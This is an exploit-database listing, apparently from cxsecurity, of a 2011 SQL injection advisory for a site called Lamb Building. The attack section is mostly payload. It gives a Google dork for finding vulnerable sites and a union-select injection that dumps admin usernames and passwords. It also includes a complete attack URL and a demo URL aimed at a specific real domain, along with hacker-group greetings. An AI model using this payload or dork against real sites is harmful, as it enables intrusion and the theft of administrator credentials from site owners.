Lamb Building SQL Injection

2011.09.02
Credit: Net.Edit0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:profile.php?id= intext:\"Lamb Building\"

__________.__ __ ___ ___ \______ \ | _____ ____ | | __ / | \ ____ | | _/ | \__ \ _/ ___\| |/ / ______ / ~ \/ ___\ | | \ |__/ __ \\ \___| < /_____/ \ Y / /_/ > |______ /____(____ /\___ >__|_ \ \___|_ /\___ / \/ \/ \/ \/ \//_____/ .ORG ################################################### [-] Exploit Title: Lamb Building SQL Injection Vulnerability [-] Author: Net.Edit0r [-]Discovered By: Mr.XHat [-] Home : Black-HG.Org [-] Version: Full [-] Tested On: Linux [-] Google Dork: inurl:profile.php?id= intext:"Lamb Building" [-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net [-] Date : 30/08/2011 [-] CVE : N/A ################################################## # Exploit: [+] 1+union+select+1,group_concat(username,0x3a,password)+from+lambbuil_1.admin-- [+] http://www.lambbuilding.co.uk/members/profile.php?id=1+union+select+1,group_concat(username,0x3a,password)+from+lambbuil_1.admin-- # Demo URL: [+] http://www.lambbuilding.co.uk/members/profile.php?id=1' ################################################## # | Greetz : # | A.Cr0x & 3H34N & 4m!n & Cyrus & tHe.k!ll3r & Mr.XHat & Mikili ################################################## magic_quotes_gpc :: Off ################################################## I Love Iran And All Iranian People ##################################################

References:

http://www.lambbuilding.co.uk/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top